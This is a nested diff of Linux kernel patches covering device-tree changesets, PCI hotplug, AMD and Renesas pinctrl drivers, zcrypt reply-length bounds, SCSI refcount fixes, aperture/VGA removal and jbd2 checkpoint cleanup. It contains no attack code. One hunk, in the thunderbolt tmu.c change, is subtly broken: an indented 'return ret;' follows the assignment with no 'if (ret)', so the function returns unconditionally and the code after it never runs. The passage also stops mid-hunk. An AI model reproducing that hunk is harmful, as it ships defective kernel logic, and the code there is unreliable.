+-			pr_err("changeset: update_property failed @%pOF/%s\n",
+-				ce->np,
+-				ce->prop->name);
+-			break;
+-		}
+ 		break;
+ 	default:
+ 		ret = -EINVAL;
+ 	}
+ 	raw_spin_unlock_irqrestore(&devtree_lock, flags);
+ 
+-	if (ret)
++	if (ret) {
++		pr_err("changeset: apply failed: %-15s %pOF:%s\n",
++		       action_names[ce->action], ce->np, ce->prop->name);
+ 		return ret;
++	}
+ 
+ 	switch (ce->action) {
+ 	case OF_RECONFIG_ATTACH_NODE:
+@@ -921,6 +905,9 @@ int of_changeset_action(struct of_changeset *ocs, unsigned long action,
+ 	if (!ce)
+ 		return -ENOMEM;
+ 
++	if (WARN_ON(action >= ARRAY_SIZE(action_names)))
++		return -EINVAL;
++
+ 	/* get a reference to the node */
+ 	ce->action = action;
+ 	ce->np = of_node_get(np);
+diff --git a/drivers/of/kexec.c b/drivers/of/kexec.c
+index f26d2ba8a3715..68278340cecfe 100644
+--- a/drivers/of/kexec.c
++++ b/drivers/of/kexec.c
+@@ -184,7 +184,8 @@ int __init ima_free_kexec_buffer(void)
+ 	if (ret)
+ 		return ret;
+ 
+-	return memblock_phys_free(addr, size);
++	memblock_free_late(addr, size);
++	return 0;
+ }
+ #endif
+ 
+diff --git a/drivers/of/unittest.c b/drivers/of/unittest.c
+index b89ab5d9fea55..9be6ed47a1ce4 100644
+--- a/drivers/of/unittest.c
++++ b/drivers/of/unittest.c
+@@ -657,12 +657,12 @@ static void __init of_unittest_parse_phandle_with_args_map(void)
+ 	memset(&args, 0, sizeof(args));
+ 
+ 	EXPECT_BEGIN(KERN_INFO,
+-		     "OF: /testcase-data/phandle-tests/consumer-b: could not find phandle");
++		     "OF: /testcase-data/phandle-tests/consumer-b: could not find phandle 12345678");
+ 
+ 	rc = of_parse_phandle_with_args_map(np, "phandle-list-bad-phandle",
+ 					    "phandle", 0, &args);
+ 	EXPECT_END(KERN_INFO,
+-		   "OF: /testcase-data/phandle-tests/consumer-b: could not find phandle");
++		   "OF: /testcase-data/phandle-tests/consumer-b: could not find phandle 12345678");
+ 
+ 	unittest(rc == -EINVAL, "expected:%i got:%i\n", -EINVAL, rc);
+ 
+diff --git a/drivers/pci/hotplug/acpiphp_glue.c b/drivers/pci/hotplug/acpiphp_glue.c
+index 6efa3d8db9a56..ea0195337bab9 100644
+--- a/drivers/pci/hotplug/acpiphp_glue.c
++++ b/drivers/pci/hotplug/acpiphp_glue.c
+@@ -504,12 +504,15 @@ static void enable_slot(struct acpiphp_slot *slot, bool bridge)
+ 				if (pass && dev->subordinate) {
+ 					check_hotplug_bridge(slot, dev);
+ 					pcibios_resource_survey_bus(dev->subordinate);
+-					__pci_bus_size_bridges(dev->subordinate,
+-							       &add_list);
++					if (pci_is_root_bus(bus))
++						__pci_bus_size_bridges(dev->subordinate, &add_list);
+ 				}
+ 			}
+ 		}
+-		__pci_bus_assign_resources(bus, &add_list, NULL);
++		if (pci_is_root_bus(bus))
++			__pci_bus_assign_resources(bus, &add_list, NULL);
++		else
++			pci_assign_unassigned_bridge_resources(bus->self);
+ 	}
+ 
+ 	acpiphp_sanitize_bus(bus);
+diff --git a/drivers/pinctrl/pinctrl-amd.c b/drivers/pinctrl/pinctrl-amd.c
+index a8df77e80549c..be6838c252f09 100644
+--- a/drivers/pinctrl/pinctrl-amd.c
++++ b/drivers/pinctrl/pinctrl-amd.c
+@@ -862,6 +862,33 @@ static const struct pinconf_ops amd_pinconf_ops = {
+ 	.pin_config_group_set = amd_pinconf_group_set,
+ };
+ 
++static void amd_gpio_irq_init(struct amd_gpio *gpio_dev)
++{
++	struct pinctrl_desc *desc = gpio_dev->pctrl->desc;
++	unsigned long flags;
++	u32 pin_reg, mask;
++	int i;
++
++	mask = BIT(WAKE_CNTRL_OFF_S0I3) | BIT(WAKE_CNTRL_OFF_S3) |
++		BIT(WAKE_CNTRL_OFF_S4);
++
++	for (i = 0; i < desc->npins; i++) {
++		int pin = desc->pins[i].number;
++		const struct pin_desc *pd = pin_desc_get(gpio_dev->pctrl, pin);
++
++		if (!pd)
++			continue;
++
++		raw_spin_lock_irqsave(&gpio_dev->lock, flags);
++
++		pin_reg = readl(gpio_dev->base + pin * 4);
++		pin_reg &= ~mask;
++		writel(pin_reg, gpio_dev->base + pin * 4);
++
++		raw_spin_unlock_irqrestore(&gpio_dev->lock, flags);
++	}
++}
++
+ #ifdef CONFIG_PM_SLEEP
+ static bool amd_gpio_should_save(struct amd_gpio *gpio_dev, unsigned int pin)
+ {
+@@ -1099,6 +1126,9 @@ static int amd_gpio_probe(struct platform_device *pdev)
+ 		return PTR_ERR(gpio_dev->pctrl);
+ 	}
+ 
++	/* Disable and mask interrupts */
++	amd_gpio_irq_init(gpio_dev);
++
+ 	girq = &gpio_dev->gc.irq;
+ 	gpio_irq_chip_set_chip(girq, &amd_gpio_irqchip);
+ 	/* This will let us handle the parent IRQ in the driver */
+diff --git a/drivers/pinctrl/renesas/pinctrl-rza2.c b/drivers/pinctrl/renesas/pinctrl-rza2.c
+index c0a04f1ee994e..12126e30dc20f 100644
+--- a/drivers/pinctrl/renesas/pinctrl-rza2.c
++++ b/drivers/pinctrl/renesas/pinctrl-rza2.c
+@@ -14,6 +14,7 @@
+ #include <linux/gpio/driver.h>
+ #include <linux/io.h>
+ #include <linux/module.h>
++#include <linux/mutex.h>
+ #include <linux/of_device.h>
+ #include <linux/pinctrl/pinmux.h>
+ 
+@@ -46,6 +47,7 @@ struct rza2_pinctrl_priv {
+ 	struct pinctrl_dev *pctl;
+ 	struct pinctrl_gpio_range gpio_range;
+ 	int npins;
++	struct mutex mutex; /* serialize adding groups and functions */
+ };
+ 
+ #define RZA2_PDR(port)		(0x0000 + (port) * 2)	/* Direction 16-bit */
+@@ -358,10 +360,14 @@ static int rza2_dt_node_to_map(struct pinctrl_dev *pctldev,
+ 		psel_val[i] = MUX_FUNC(value);
+ 	}
+ 
++	mutex_lock(&priv->mutex);
++
+ 	/* Register a single pin group listing all the pins we read from DT */
+ 	gsel = pinctrl_generic_add_group(pctldev, np->name, pins, npins, NULL);
+-	if (gsel < 0)
+-		return gsel;
++	if (gsel < 0) {
++		ret = gsel;
++		goto unlock;
++	}
+ 
+ 	/*
+ 	 * Register a single group function where the 'data' is an array PSEL
+@@ -390,6 +396,8 @@ static int rza2_dt_node_to_map(struct pinctrl_dev *pctldev,
+ 	(*map)->data.mux.function = np->name;
+ 	*num_maps = 1;
+ 
++	mutex_unlock(&priv->mutex);
++
+ 	return 0;
+ 
+ remove_function:
+@@ -398,6 +406,9 @@ remove_function:
+ remove_group:
+ 	pinctrl_generic_remove_group(pctldev, gsel);
+ 
++unlock:
++	mutex_unlock(&priv->mutex);
++
+ 	dev_err(priv->dev, "Unable to parse DT node %s\n", np->name);
+ 
+ 	return ret;
+@@ -473,6 +484,8 @@ static int rza2_pinctrl_probe(struct platform_device *pdev)
+ 	if (IS_ERR(priv->base))
+ 		return PTR_ERR(priv->base);
+ 
++	mutex_init(&priv->mutex);
++
+ 	platform_set_drvdata(pdev, priv);
+ 
+ 	priv->npins = (int)(uintptr_t)of_device_get_match_data(&pdev->dev) *
+diff --git a/drivers/pinctrl/renesas/pinctrl-rzg2l.c b/drivers/pinctrl/renesas/pinctrl-rzg2l.c
+index fd11d28e5a1e4..2a617832a7e60 100644
+--- a/drivers/pinctrl/renesas/pinctrl-rzg2l.c
++++ b/drivers/pinctrl/renesas/pinctrl-rzg2l.c
+@@ -11,6 +11,7 @@
+ #include <linux/io.h>
+ #include <linux/interrupt.h>
+ #include <linux/module.h>
++#include <linux/mutex.h>
+ #include <linux/of_device.h>
+ #include <linux/of_irq.h>
+ #include <linux/pinctrl/pinconf-generic.h>
+@@ -146,10 +147,11 @@ struct rzg2l_pinctrl {
+ 	struct gpio_chip		gpio_chip;
+ 	struct pinctrl_gpio_range	gpio_range;
+ 	DECLARE_BITMAP(tint_slot, RZG2L_TINT_MAX_INTERRUPT);
+-	spinlock_t			bitmap_lock;
++	spinlock_t			bitmap_lock; /* protect tint_slot bitmap */
+ 	unsigned int			hwirq[RZG2L_TINT_MAX_INTERRUPT];
+ 
+-	spinlock_t			lock;
++	spinlock_t			lock; /* lock read/write registers */
++	struct mutex			mutex; /* serialize adding groups and functions */
+ };
+ 
+ static const unsigned int iolh_groupa_mA[] = { 2, 4, 8, 12 };
+@@ -359,11 +361,13 @@ static int rzg2l_dt_subnode_to_map(struct pinctrl_dev *pctldev,
+ 		name = np->name;
+ 	}
+ 
++	mutex_lock(&pctrl->mutex);
++
+ 	/* Register a single pin group listing all the pins we read from DT */
+ 	gsel = pinctrl_generic_add_group(pctldev, name, pins, num_pinmux, NULL);
+ 	if (gsel < 0) {
+ 		ret = gsel;
+-		goto done;
++		goto unlock;
+ 	}
+ 
+ 	/*
+@@ -377,6 +381,8 @@ static int rzg2l_dt_subnode_to_map(struct pinctrl_dev *pctldev,
+ 		goto remove_group;
+ 	}
+ 
++	mutex_unlock(&pctrl->mutex);
++
+ 	maps[idx].type = PIN_MAP_TYPE_MUX_GROUP;
+ 	maps[idx].data.mux.group = name;
+ 	maps[idx].data.mux.function = name;
+@@ -388,6 +394,8 @@ static int rzg2l_dt_subnode_to_map(struct pinctrl_dev *pctldev,
+ 
+ remove_group:
+ 	pinctrl_generic_remove_group(pctldev, gsel);
++unlock:
++	mutex_unlock(&pctrl->mutex);
+ done:
+ 	*index = idx;
+ 	kfree(configs);
+@@ -1501,6 +1509,7 @@ static int rzg2l_pinctrl_probe(struct platform_device *pdev)
+ 
+ 	spin_lock_init(&pctrl->lock);
+ 	spin_lock_init(&pctrl->bitmap_lock);
++	mutex_init(&pctrl->mutex);
+ 
+ 	platform_set_drvdata(pdev, pctrl);
+ 
+diff --git a/drivers/pinctrl/renesas/pinctrl-rzv2m.c b/drivers/pinctrl/renesas/pinctrl-rzv2m.c
+index 35f382b055e83..2858800288bb7 100644
+--- a/drivers/pinctrl/renesas/pinctrl-rzv2m.c
++++ b/drivers/pinctrl/renesas/pinctrl-rzv2m.c
+@@ -14,6 +14,7 @@
+ #include <linux/gpio/driver.h>
+ #include <linux/io.h>
+ #include <linux/module.h>
++#include <linux/mutex.h>
+ #include <linux/of_device.h>
+ #include <linux/pinctrl/pinconf-generic.h>
+ #include <linux/pinctrl/pinconf.h>
+@@ -121,7 +122,8 @@ struct rzv2m_pinctrl {
+ 	struct gpio_chip		gpio_chip;
+ 	struct pinctrl_gpio_range	gpio_range;
+ 
+-	spinlock_t			lock;
++	spinlock_t			lock; /* lock read/write registers */
++	struct mutex			mutex; /* serialize adding groups and functions */
+ };
+ 
+ static const unsigned int drv_1_8V_group2_uA[] = { 1800, 3800, 7800, 11000 };
+@@ -320,11 +322,13 @@ static int rzv2m_dt_subnode_to_map(struct pinctrl_dev *pctldev,
+ 		name = np->name;
+ 	}
+ 
++	mutex_lock(&pctrl->mutex);
++
+ 	/* Register a single pin group listing all the pins we read from DT */
+ 	gsel = pinctrl_generic_add_group(pctldev, name, pins, num_pinmux, NULL);
+ 	if (gsel < 0) {
+ 		ret = gsel;
+-		goto done;
++		goto unlock;
+ 	}
+ 
+ 	/*
+@@ -338,6 +342,8 @@ static int rzv2m_dt_subnode_to_map(struct pinctrl_dev *pctldev,
+ 		goto remove_group;
+ 	}
+ 
++	mutex_unlock(&pctrl->mutex);
++
+ 	maps[idx].type = PIN_MAP_TYPE_MUX_GROUP;
+ 	maps[idx].data.mux.group = name;
+ 	maps[idx].data.mux.function = name;
+@@ -349,6 +355,8 @@ static int rzv2m_dt_subnode_to_map(struct pinctrl_dev *pctldev,
+ 
+ remove_group:
+ 	pinctrl_generic_remove_group(pctldev, gsel);
++unlock:
++	mutex_unlock(&pctrl->mutex);
+ done:
+ 	*index = idx;
+ 	kfree(configs);
+@@ -1070,6 +1078,7 @@ static int rzv2m_pinctrl_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	spin_lock_init(&pctrl->lock);
++	mutex_init(&pctrl->mutex);
+ 
+ 	platform_set_drvdata(pdev, pctrl);
+ 
+diff --git a/drivers/platform/x86/ideapad-laptop.c b/drivers/platform/x86/ideapad-laptop.c
+index bd38c7dcae347..de03b8889e9d3 100644
+--- a/drivers/platform/x86/ideapad-laptop.c
++++ b/drivers/platform/x86/ideapad-laptop.c
+@@ -1176,6 +1176,11 @@ static const struct key_entry ideapad_keymap[] = {
+ 	{ KE_IGNORE,	0x03 | IDEAPAD_WMI_KEY },
+ 	/* Customizable Lenovo Hotkey ("star" with 'S' inside) */
+ 	{ KE_KEY,	0x01 | IDEAPAD_WMI_KEY, { KEY_FAVORITES } },
++	{ KE_KEY,	0x04 | IDEAPAD_WMI_KEY, { KEY_SELECTIVE_SCREENSHOT } },
++	/* Lenovo Support */
++	{ KE_KEY,	0x07 | IDEAPAD_WMI_KEY, { KEY_HELP } },
++	{ KE_KEY,	0x0e | IDEAPAD_WMI_KEY, { KEY_PICKUP_PHONE } },
++	{ KE_KEY,	0x0f | IDEAPAD_WMI_KEY, { KEY_HANGUP_PHONE } },
+ 	/* Dark mode toggle */
+ 	{ KE_KEY,	0x13 | IDEAPAD_WMI_KEY, { KEY_PROG1 } },
+ 	/* Sound profile switch */
+diff --git a/drivers/s390/crypto/zcrypt_msgtype6.c b/drivers/s390/crypto/zcrypt_msgtype6.c
+index f99a9ef42116f..84e3ad290f6ba 100644
+--- a/drivers/s390/crypto/zcrypt_msgtype6.c
++++ b/drivers/s390/crypto/zcrypt_msgtype6.c
+@@ -926,8 +926,7 @@ static void zcrypt_msgtype6_receive(struct ap_queue *aq,
+ 		.type = TYPE82_RSP_CODE,
+ 		.reply_code = REP82_ERROR_MACHINE_FAILURE,
+ 	};
+-	struct response_type *resp_type =
+-		(struct response_type *)msg->private;
++	struct response_type *resp_type = msg->private;
+ 	struct type86x_reply *t86r;
+ 	int len;
+ 
+@@ -982,8 +981,7 @@ static void zcrypt_msgtype6_receive_ep11(struct ap_queue *aq,
+ 		.type = TYPE82_RSP_CODE,
+ 		.reply_code = REP82_ERROR_MACHINE_FAILURE,
+ 	};
+-	struct response_type *resp_type =
+-		(struct response_type *)msg->private;
++	struct response_type *resp_type = msg->private;
+ 	struct type86_ep11_reply *t86r;
+ 	int len;
+ 
+@@ -1156,23 +1154,36 @@ static long zcrypt_msgtype6_send_cprb(bool userspace, struct zcrypt_queue *zq,
+ 				      struct ica_xcRB *xcrb,
+ 				      struct ap_message *ap_msg)
+ {
+-	int rc;
+-	struct response_type *rtype = (struct response_type *)(ap_msg->private);
++	struct response_type *rtype = ap_msg->private;
+ 	struct {
+ 		struct type6_hdr hdr;
+ 		struct CPRBX cprbx;
+ 		/* ... more data blocks ... */
+ 	} __packed * msg = ap_msg->msg;
+-
+-	/*
+-	 * Set the queue's reply buffer length minus 128 byte padding
+-	 * as reply limit for the card firmware.
+-	 */
+-	msg->hdr.fromcardlen1 = min_t(unsigned int, msg->hdr.fromcardlen1,
+-				      zq->reply.bufsize - 128);
+-	if (msg->hdr.fromcardlen2)
+-		msg->hdr.fromcardlen2 =
+-			zq->reply.bufsize - msg->hdr.fromcardlen1 - 128;
++	unsigned int max_payload_size;
++	int rc, delta;
++
++	/* calculate maximum payload for this card and msg type */
++	max_payload_size = zq->reply.bufsize - sizeof(struct type86_fmt2_msg);
++
++	/* limit each of the two from fields to the maximum payload size */
++	msg->hdr.fromcardlen1 = min(msg->hdr.fromcardlen1, max_payload_size);
++	msg->hdr.fromcardlen2 = min(msg->hdr.fromcardlen2, max_payload_size);
++
++	/* calculate delta if the sum of both exceeds max payload size */
++	delta = msg->hdr.fromcardlen1 + msg->hdr.fromcardlen2
++		- max_payload_size;
++	if (delta > 0) {
++		/*
++		 * Sum exceeds maximum payload size, prune fromcardlen1
++		 * (always trust fromcardlen2)
++		 */
++		if (delta > msg->hdr.fromcardlen1) {
++			rc = -EINVAL;
++			goto out;
++		}
++		msg->hdr.fromcardlen1 -= delta;
++	}
+ 
+ 	init_completion(&rtype->work);
+ 	rc = ap_queue_message(zq->queue, ap_msg);
+@@ -1243,7 +1254,7 @@ static long zcrypt_msgtype6_send_ep11_cprb(bool userspace, struct zcrypt_queue *
+ {
+ 	int rc;
+ 	unsigned int lfmt;
+-	struct response_type *rtype = (struct response_type *)(ap_msg->private);
++	struct response_type *rtype = ap_msg->private;
+ 	struct {
+ 		struct type6_hdr hdr;
+ 		struct ep11_cprb cprbx;
+@@ -1365,7 +1376,7 @@ static long zcrypt_msgtype6_rng(struct zcrypt_queue *zq,
+ 		short int verb_length;
+ 		short int key_length;
+ 	} __packed * msg = ap_msg->msg;
+-	struct response_type *rtype = (struct response_type *)(ap_msg->private);
++	struct response_type *rtype = ap_msg->private;
+ 	int rc;
+ 
+ 	msg->cprbx.domain = AP_QID_QUEUE(zq->queue->qid);
+diff --git a/drivers/scsi/raid_class.c b/drivers/scsi/raid_class.c
+index 711252e52d8e1..95a86e0dfd77a 100644
+--- a/drivers/scsi/raid_class.c
++++ b/drivers/scsi/raid_class.c
+@@ -209,54 +209,6 @@ raid_attr_ro_state(level);
+ raid_attr_ro_fn(resync);
+ raid_attr_ro_state_fn(state);
+ 
+-static void raid_component_release(struct device *dev)
+-{
+-	struct raid_component *rc =
+-		container_of(dev, struct raid_component, dev);
+-	dev_printk(KERN_ERR, rc->dev.parent, "COMPONENT RELEASE\n");
+-	put_device(rc->dev.parent);
+-	kfree(rc);
+-}
+-
+-int raid_component_add(struct raid_template *r,struct device *raid_dev,
+-		       struct device *component_dev)
+-{
+-	struct device *cdev =
+-		attribute_container_find_class_device(&r->raid_attrs.ac,
+-						      raid_dev);
+-	struct raid_component *rc;
+-	struct raid_data *rd = dev_get_drvdata(cdev);
+-	int err;
+-
+-	rc = kzalloc(sizeof(*rc), GFP_KERNEL);
+-	if (!rc)
+-		return -ENOMEM;
+-
+-	INIT_LIST_HEAD(&rc->node);
+-	device_initialize(&rc->dev);
+-	rc->dev.release = raid_component_release;
+-	rc->dev.parent = get_device(component_dev);
+-	rc->num = rd->component_count++;
+-
+-	dev_set_name(&rc->dev, "component-%d", rc->num);
+-	list_add_tail(&rc->node, &rd->component_list);
+-	rc->dev.class = &raid_class.class;
+-	err = device_add(&rc->dev);
+-	if (err)
+-		goto err_out;
+-
+-	return 0;
+-
+-err_out:
+-	put_device(&rc->dev);
+-	list_del(&rc->node);
+-	rd->component_count--;
+-	put_device(component_dev);
+-	kfree(rc);
+-	return err;
+-}
+-EXPORT_SYMBOL(raid_component_add);
+-
+ struct raid_template *
+ raid_class_attach(struct raid_function_template *ft)
+ {
+diff --git a/drivers/scsi/snic/snic_disc.c b/drivers/scsi/snic/snic_disc.c
+index cd27562ec922e..6c529b37f3b46 100644
+--- a/drivers/scsi/snic/snic_disc.c
++++ b/drivers/scsi/snic/snic_disc.c
+@@ -303,12 +303,11 @@ snic_tgt_create(struct snic *snic, struct snic_tgt_id *tgtid)
+ 			      "Snic Tgt: device_add, with err = %d\n",
+ 			      ret);
+ 
+-		put_device(&tgt->dev);
+ 		put_device(&snic->shost->shost_gendev);
+ 		spin_lock_irqsave(snic->shost->host_lock, flags);
+ 		list_del(&tgt->list);
+ 		spin_unlock_irqrestore(snic->shost->host_lock, flags);
+-		kfree(tgt);
++		put_device(&tgt->dev);
+ 		tgt = NULL;
+ 
+ 		return tgt;
+diff --git a/drivers/thunderbolt/tmu.c b/drivers/thunderbolt/tmu.c
+index 626aca3124b1c..d9544600b3867 100644
+--- a/drivers/thunderbolt/tmu.c
++++ b/drivers/thunderbolt/tmu.c
+@@ -415,7 +415,8 @@ int tb_switch_tmu_disable(struct tb_switch *sw)
+ 		 * uni-directional mode and we don't want to change it's TMU
+ 		 * mode.
+ 		 */
+-		tb_switch_tmu_rate_write(sw, TB_SWITCH_TMU_RATE_OFF);
++		ret = tb_switch_tmu_rate_write(sw, TB_SWITCH_TMU_RATE_OFF);
++			return ret;
+ 
+ 		tb_port_tmu_time_sync_disable(up);
+ 		ret = tb_port_tmu_time_sync_disable(down);
+diff --git a/drivers/video/aperture.c b/drivers/video/aperture.c
+index 5c94abdb1ad6d..3e4a1f55f51b3 100644
+--- a/drivers/video/aperture.c
++++ b/drivers/video/aperture.c
+@@ -298,14 +298,6 @@ int aperture_remove_conflicting_devices(resource_size_t base, resource_size_t si
+ 
+ 	aperture_detach_devices(base, size);
+ 
+-	/*
+-	 * If this is the primary adapter, there could be a VGA device
+-	 * that consumes the VGA framebuffer I/O range. Remove this device
+-	 * as well.
+-	 */
+-	if (primary)
+-		aperture_detach_devices(VGA_FB_PHYS_BASE, VGA_FB_PHYS_SIZE);
+-
+ 	return 0;
+ }
+ EXPORT_SYMBOL(aperture_remove_conflicting_devices);
+@@ -344,13 +336,22 @@ int aperture_remove_conflicting_pci_devices(struct pci_dev *pdev, const char *na
+ 		aperture_detach_devices(base, size);
+ 	}
+ 
+-	/*
+-	 * WARNING: Apparently we must kick fbdev drivers before vgacon,
+-	 * otherwise the vga fbdev driver falls over.
+-	 */
+-	ret = vga_remove_vgacon(pdev);
+-	if (ret)
+-		return ret;
++	if (primary) {
++		/*
++		 * If this is the primary adapter, there could be a VGA device
++		 * that consumes the VGA framebuffer I/O range. Remove this
++		 * device as well.
++		 */
++		aperture_detach_devices(VGA_FB_PHYS_BASE, VGA_FB_PHYS_SIZE);
++
++		/*
++		 * WARNING: Apparently we must kick fbdev drivers before vgacon,
++		 * otherwise the vga fbdev driver falls over.
++		 */
++		ret = vga_remove_vgacon(pdev);
++		if (ret)
++			return ret;
++	}
+ 
+ 	return 0;
+ 
+diff --git a/drivers/video/fbdev/aty/radeon_base.c b/drivers/video/fbdev/aty/radeon_base.c
+index 8b28c9bddd974..50c384ce28837 100644
+--- a/drivers/video/fbdev/aty/radeon_base.c
++++ b/drivers/video/fbdev/aty/radeon_base.c
+@@ -2238,14 +2238,6 @@ static const struct bin_attribute edid2_attr = {
+ 	.read	= radeon_show_edid2,
+ };
+ 
+-static int radeon_kick_out_firmware_fb(struct pci_dev *pdev)
+-{
+-	resource_size_t base = pci_resource_start(pdev, 0);
+-	resource_size_t size = pci_resource_len(pdev, 0);
+-
+-	return aperture_remove_conflicting_devices(base, size, false, KBUILD_MODNAME);
+-}
+-
+ static int radeonfb_pci_register(struct pci_dev *pdev,
+ 				 const struct pci_device_id *ent)
+ {
+@@ -2296,7 +2288,7 @@ static int radeonfb_pci_register(struct pci_dev *pdev,
+ 	rinfo->fb_base_phys = pci_resource_start (pdev, 0);
+ 	rinfo->mmio_base_phys = pci_resource_start (pdev, 2);
+ 
+-	ret = radeon_kick_out_firmware_fb(pdev);
++	ret = aperture_remove_conflicting_pci_devices(pdev, KBUILD_MODNAME);
+ 	if (ret)
+ 		goto err_release_fb;
+ 
+diff --git a/fs/attr.c b/fs/attr.c
+index b45f30e516fad..9b9a70e0cc54f 100644
+--- a/fs/attr.c
++++ b/fs/attr.c
+@@ -47,6 +47,7 @@ int setattr_should_drop_sgid(struct user_namespace *mnt_userns,
+ 		return ATTR_KILL_SGID;
+ 	return 0;
+ }
++EXPORT_SYMBOL(setattr_should_drop_sgid);
+ 
+ /**
+  * setattr_should_drop_suidgid - determine whether the set{g,u}id bit needs to
+diff --git a/fs/internal.h b/fs/internal.h
+index 46caa33373a48..42df013f7fe76 100644
+--- a/fs/internal.h
++++ b/fs/internal.h
+@@ -242,5 +242,3 @@ ssize_t __kernel_write_iter(struct file *file, struct iov_iter *from, loff_t *po
+ /*
+  * fs/attr.c
+  */
+-int setattr_should_drop_sgid(struct user_namespace *mnt_userns,
+-			     const struct inode *inode);
+diff --git a/fs/jbd2/checkpoint.c b/fs/jbd2/checkpoint.c
+index c4e0da6db7195..9ec91017a7f3c 100644
+--- a/fs/jbd2/checkpoint.c
++++ b/fs/jbd2/checkpoint.c
+@@ -27,7 +27,7 @@
+  *
+  * Called with j_list_lock held.
+  */
+-static inline void __buffer_unlink_first(struct journal_head *jh)
++static inline void __buffer_unlink(struct journal_head *jh)
+ {
+ 	transaction_t *transaction = jh->b_cp_transaction;
+ 
+@@ -40,23 +40,6 @@ static inline void __buffer_unlink_first(struct journal_head *jh)
+ 	}
+ }
+ 
+-/*
+- * Unlink a buffer from a transaction checkpoint(io) list.
+- *
+- * Called with j_list_lock held.
+- */
+-static inline void __buffer_unlink(struct journal_head *jh)
+-{
+-	transaction_t *transaction = jh->b_cp_transaction;
+-
+-	__buffer_unlink_first(jh);
+-	if (transaction->t_checkpoint_io_list == jh) {
+-		transaction->t_checkpoint_io_list = jh->b_cpnext;
+-		if (transaction->t_checkpoint_io_list == jh)
+-			transaction->t_checkpoint_io_list = NULL;
+-	}
+-}
+-
+ /*
+  * Check a checkpoint buffer could be release or not.
+  *
+@@ -366,50 +349,10 @@ int jbd2_cleanup_journal_tail(journal_t *journal)
+ 
+ /* Checkpoint list management */
+ 
+-/*
+- * journal_clean_one_cp_list
+- *
+- * Find all the written-back checkpoint buffers in the given list and
+- * release them. If 'destroy' is set, clean all buffers unconditionally.
+- *
+- * Called with j_list_lock held.
+- * Returns 1 if we freed the transaction, 0 otherwise.
+- */
+-static int journal_clean_one_cp_list(struct journal_head *jh, bool destroy)
+-{
+-	struct journal_head *last_jh;
+-	struct journal_head *next_jh = jh;
+-
+-	if (!jh)
+-		return 0;
+-
+-	last_jh = jh->b_cpprev;
+-	do {
+-		jh = next_jh;
+-		next_jh = jh->b_cpnext;
+-
+-		if (!destroy && __cp_buffer_busy(jh))
+-			return 0;
+-
+-		if (__jbd2_journal_remove_checkpoint(jh))
+-			return 1;
+-		/*
+-		 * This function only frees up some memory
+-		 * if possible so we dont have an obligation
+-		 * to finish processing. Bail out if preemption
+-		 * requested:
+-		 */
+-		if (need_resched())
+-			return 0;
+-	} while (jh != last_jh);
+-
+-	return 0;
+-}
+-
+ /*
+  * journal_shrink_one_cp_list
+  *
+- * Find 'nr_to_scan' written-back checkpoint buffers in the given list
++ * Find all the written-back checkpoint buffers in the given list
+  * and try to release them. If the whole transaction is released, set
+  * the 'released' parameter. Return the number of released checkpointed
+  * buffers.
+@@ -417,15 +360,15 @@ static int journal_clean_one_cp_list(struct journal_head *jh, bool destroy)
+  * Called with j_list_lock held.
+  */
+ static unsigned long journal_shrink_one_cp_list(struct journal_head *jh,
+-						unsigned long *nr_to_scan,
+-						bool *released)
++						bool destroy, bool *released)
+ {
+ 	struct journal_head *last_jh;
+ 	struct journal_head *next_jh = jh;
+ 	unsigned long nr_freed = 0;
+ 	int ret;
+ 
+-	if (!jh || *nr_to_scan == 0)
++	*released = false;
++	if (!jh)
+ 		return 0;
+ 
+ 	last_jh = jh->b_cpprev;
+@@ -433,12 +376,15 @@ static unsigned long journal_shrink_one_cp_list(struct journal_head *jh,
+ 		jh = next_jh;
+ 		next_jh = jh->b_cpnext;
+ 
+-		(*nr_to_scan)--;
+-		if (__cp_buffer_busy(jh))
+-			continue;
++		if (destroy) {
++			ret = __jbd2_journal_remove_checkpoint(jh);
++		} else {
++			ret = jbd2_journal_try_remove_checkpoint(jh);
++			if (ret < 0)
++				continue;
++		}
+ 
+ 		nr_freed++;
+-		ret = __jbd2_journal_remove_checkpoint(jh);
+ 		if (ret) {
+ 			*released = true;
+ 			break;
+@@ -446,7 +392,7 @@ static unsigned long journal_shrink_one_cp_list(struct journal_head *jh,
+ 
+ 		if (need_resched())
+ 			break;
+-	} while (jh != last_jh && *nr_to_scan);
++	} while (jh != last_jh);
+ 
+ 	return nr_freed;
+ }
+@@ -464,11 +410,11 @@ unsigned long jbd2_journal_shrink_checkpoint_list(journal_t *journal,
+ 						  unsigned long *nr_to_scan)
+ {
+ 	transaction_t *transaction, *last_transaction, *next_transaction;
+-	bool released;
++	bool __maybe_unused released;
+ 	tid_t first_tid = 0, last_tid = 0, next_tid = 0;
+ 	tid_t tid = 0;
+ 	unsigned long nr_freed = 0;
+-	unsigned long nr_scanned = *nr_to_scan;
++	unsigned long freed;
+ 
+ again:
+ 	spin_lock(&journal->j_list_lock);
+@@ -497,19 +443,11 @@ again:
+ 		transaction = next_transaction;
+ 		next_transaction = transaction->t_cpnext;
+ 		tid = transaction->t_tid;
+-		released = false;
+ 
+-		nr_freed += journal_shrink_one_cp_list(transaction->t_checkpoint_list,
+-						       nr_to_scan, &released);
+-		if (*nr_to_scan == 0)
+-			break;
+-		if (need_resched() || spin_needbreak(&journal->j_list_lock))
+-			break;
+-		if (released)
+-			continue;
+-
+-		nr_freed += journal_shrink_one_cp_list(transaction->t_checkpoint_io_list,
+-						       nr_to_scan, &released);
++		freed = journal_shrink_one_cp_list(transaction->t_checkpoint_list,
++						   false, &released);
++		nr_freed += freed;
++		(*nr_to_scan) -= min(*nr_to_scan, freed);
+ 		if (*nr_to_scan == 0)
+ 			break;
+ 		if (need_resched() || spin_needbreak(&journal->j_list_lock))
+@@ -530,9 +468,8 @@ again:
+ 	if (*nr_to_scan && next_tid)
+ 		goto again;
+ out:
+-	nr_scanned -= *nr_to_scan;
+ 	trace_jbd2_shrink_checkpoint_list(journal, first_tid, tid, last_tid,
+-					  nr_freed, nr_scanned, next_tid);
++					  nr_freed, next_tid);
+ 
+ 	return nr_freed;
+ }
+@@ -548,7 +485,7 @@ out:
+ void __jbd2_journal_clean_checkpoint_list(journal_t *journal, bool destroy)
+ {
+ 	transaction_t *transaction, *last_transaction, *next_transaction;
+-	int ret;
++	bool released;
+ 
+ 	transaction = journal->j_checkpoint_transactions;
+ 	if (!transaction)
+@@ -559,8 +496,8 @@ void __jbd2_journal_clean_checkpoint_list(journal_t *journal, bool destroy)
+ 	do {
+ 		transaction = next_transaction;
+ 		next_transaction = transaction->t_cpnext;
+-		ret = journal_clean_one_cp_list(transaction->t_checkpoint_list,
+-						destroy);
